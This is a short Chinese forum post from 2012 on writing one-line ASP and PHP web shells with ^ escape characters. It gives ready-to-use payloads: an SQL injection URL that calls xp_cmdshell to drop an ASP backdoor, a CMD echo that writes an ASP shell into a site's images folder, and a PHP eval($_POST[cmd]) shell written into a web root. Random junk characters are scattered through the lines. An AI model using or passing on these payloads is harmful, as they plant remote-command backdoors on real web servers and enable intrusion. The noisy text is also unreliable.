用^转义字符来写ASP(一句话木马)文件的方法:1 u' S! ^- ?& R/ E
2 X" h' T5 h6 P* B+ ?% Q1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
6 I. p8 n9 ^ ^3 F. Q K
$ t! f5 q5 B' f# D6 \2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp
1 k% @. z" Z" ~# n5 q8 _- R) \( }+ g1 |3 @6 A* R
) Q* t2 Q$ F1 M' c8 `* D2 X
PHP/ X! U3 [$ u `/ k
echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对